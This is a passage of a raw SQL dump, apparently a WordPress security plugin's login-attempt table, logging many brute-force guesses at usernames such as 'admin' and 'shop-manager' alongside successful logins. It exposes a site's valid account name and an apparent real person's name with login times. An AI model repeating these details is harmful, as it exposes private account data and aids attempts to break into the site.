Firefox/68.0'),(1063,2528,1560280156.727324,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y.i','Windows Live Writter'),(1064,2529,1560282544.684633,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0E','Windows Live Writter'),(1065,2530,1560285083.635293,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0H','Windows Live Writter'),(1066,2531,1560289739.407531,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y.kj','Poster'),(1067,2532,1560292120.927248,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0j','WordPress'),(1068,2533,1560294908.260140,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0','Poster'),(1069,2534,1560299701.821340,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0G%','Windows Live Writter'),(1070,2535,1560301930.810772,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0Y','Windows Live Writter'),(1071,2536,1560304336.271606,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y/59','Windows Live Writter'),(1072,2537,1560309438.014672,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y.l','WordPress'),(1073,2538,1560312050.798294,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0gm','Poster'),(1074,2539,1560314905.649328,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0t','WordPress'),(1075,2543,1560319911.769005,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02>','Poster'),(1076,2544,1560320849.225058,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1077,2546,1560322399.814702,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G\'','Windows Live Writter'),(1078,2547,1560325242.464112,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.io','Poster'),(1079,2548,1560330599.903321,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0B','Poster'),(1080,2550,1560332796.666255,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0Y.i~','Windows Live Writter'),(1081,2551,1560336010.905397,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0kx?','WordPress'),(1082,2552,1560340958.717862,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0G','WordPress'),(1083,2556,1560343860.647913,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0c','Windows Live Writter'),(1084,2557,1560346769.991496,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.l','Windows Live Writter'),(1085,2558,1560355241.796974,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0H','Poster'),(1086,2559,1560358188.375869,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.i','Windows Live Writter'),(1087,2560,1560408209.519826,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1088,2561,1560410164.111553,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36'),(1089,2584,1560520188.454008,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(1090,2585,1560520265.435125,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1091,2589,1560807727.505807,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0iP','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(1092,2590,1560842116.770426,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1093,2591,1560844290.757678,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0G','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(1094,2592,1560847503.654901,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1095,2593,1563447702.396609,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(1096,2594,1563448951.039418,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1097,2595,1563450824.363537,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1098,2596,1563452217.977278,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1099,2597,1563453854.975630,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1100,2598,1563453862.263041,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1101,2599,1563454834.239367,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1102,2601,1563457003.913412,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1103,2602,1563458844.309662,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0^-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1104,2603,1563460897.780294,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1105,2604,1563462868.501025,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1106,2605,1563466834.285230,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1107,2606,1563471105.576120,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1108,2607,1563473220.358993,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ѥ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1109,2608,1563476863.286597,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D	','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1110,2616,1563487024.636270,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1111,2617,1563498579.804484,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1112,2618,1563502524.141261,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1113,2619,1563514388.549151,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0X','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1114,2624,1563518504.671651,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Pg','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1115,2625,1563522489.142228,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1116,2626,1563526300.467662,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0NЌ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1117,2627,1563532769.570605,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1118,2628,1563537096.379869,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0j','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1119,2629,1563539421.829822,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1120,2630,1563543641.069573,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1121,2631,1563550178.837868,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0|h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1122,2634,1563552318.676831,1,'loginFailInvalidUsername','garak',0,'\0\0\0\0\0\0\0\0\0\0Jf','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1123,2634,1563552318.692771,1,'loginFailInvalidUsername','garak',0,'\0\0\0\0\0\0\0\0\0\0Jf','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1124,2637,1563552540.053587,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1125,2672,1563556800.580332,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1126,2765,1563572725.101383,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0GG','WordPress'),(1127,2771,1563573622.793446,1,'loginFailInvalidUsername','webmaster',0,'\0\0\0\0\0\0\0\0\0\0\\1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1128,2788,1563576365.487151,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02p','WordPress'),(1129,2799,1563578171.073604,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0B','Windows Live Writter'),(1130,2814,1563580124.343313,1,'loginFailInvalidUsername','editor',0,'\0\0\0\0\0\0\0\0\0\0b>','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1131,2816,1563580824.134465,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\07','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1132,2819,1563581621.910172,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0g4','WordPress'),(1133,2829,1563582974.040677,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1134,2831,1563583087.375806,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0H','Windows Live Writter'),(1135,2837,1563584498.200758,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0?!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1136,2838,1563584512.475888,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0pNS','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1137,2861,1563589133.151694,1,'loginFailInvalidUsername','Service',0,'\0\0\0\0\0\0\0\0\0\0j\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1138,2867,1563591203.369842,1,'loginFailInvalidUsername','admin-2',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1139,2871,1563592040.985477,1,'loginFailInvalidUsername','david',0,'\0\0\0\0\0\0\0\0\0\0F<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1140,2885,1563594174.898938,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1141,2894,1563595835.776171,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0-w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1142,2896,1563596517.741386,1,'loginFailInvalidUsername','sam-mi',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1143,2904,1563598827.798175,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0%	','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1144,2905,1563600555.296734,1,'loginFailInvalidUsername','wpadmin',0,'\0\0\0\0\0\0\0\0\0\0-@h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1145,2906,1563601277.692693,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0|h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1146,2907,1563602870.769602,1,'loginFailInvalidUsername','chris',0,'\0\0\0\0\0\0\0\0\0\0\"WV','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1147,2908,1563604795.178496,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1148,2909,1563606302.682598,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ɒ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1149,2910,1563607093.815489,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0g\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1150,2911,1563609502.368084,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\\?n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1151,2912,1563611241.269233,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1152,2913,1563613780.240230,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\04','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1153,2914,1563614379.418586,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0@GN','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1154,2915,1563615945.607352,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0-B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1155,2916,1563618506.021278,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0]gg','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1156,2917,1563621748.808919,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0]Z1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1157,2918,1563623516.364011,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\06q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1158,2919,1563626678.960399,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1159,2920,1563627997.306239,1,'loginFailInvalidUsername','companyregistration',0,'\0\0\0\0\0\0\0\0\0\0m/d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1160,2921,1563630796.111290,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1161,2922,1563632648.963005,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0_oi','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1162,2923,1563633415.398453,1,'loginFailInvalidUsername','[asDomaincom]',0,'\0\0\0\0\0\0\0\0\0\0y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1163,2924,1563639439.709434,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1164,2925,1563646274.012195,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\01','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1165,2926,1563647884.719922,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1166,2927,1563648830.264008,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1167,2928,1563651497.761724,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0.ƴ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1168,2933,1563655559.585906,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1169,2934,1563655881.460913,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'),(1170,2935,1563656199.328638,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0q\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1171,2936,1563657061.103433,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0HY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1172,2937,1563659775.130584,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0X:','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1173,2938,1563661712.835189,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0g#','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1174,2939,1563662359.704803,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Fp','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1175,2940,1563664140.504701,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\0k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1176,2941,1563665251.499754,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1177,2942,1563670727.265355,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0F<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1178,2943,1563672612.897726,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0S','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1179,2944,1563673444.694843,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ν&','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1180,2945,1563675349.761377,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1181,2946,1563679108.336330,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1182,2947,1563681872.562654,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0l!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1183,2948,1563683753.213696,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Ai','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1184,2949,1563684635.056634,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1185,2950,1563689407.136265,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0l!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1186,3038,1563697577.848110,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0\"Pc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1187,3039,1563697622.006575,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0-?A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1188,3040,1563697787.842791,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\04;!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1189,3041,1563698003.124638,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\02>8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1190,3046,1563699285.440139,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0=!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1191,3047,1563699542.590019,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0ʁΈ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1192,3048,1563699872.538750,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1193,3049,1563700481.507470,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1194,3050,1563702019.071266,1,'loginFailInvalidUsername','companyregistration',0,'\0\0\0\0\0\0\0\0\0\0(Fڥ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1195,3051,1563702348.096912,1,'loginFailInvalidUsername','companyregistration',0,'\0\0\0\0\0\0\0\0\0\0m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1196,3052,1563702761.638771,1,'loginFailInvalidUsername','companyregistration',0,'\0\0\0\0\0\0\0\0\0\0ˊ[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1197,3054,1563704101.624935,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0ҘB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1198,3055,1563704514.800055,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0Ta','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1199,3056,1563704989.738780,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1200,3057,1563705649.265591,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1201,3058,1563706252.815712,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1202,3059,1563707176.873859,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 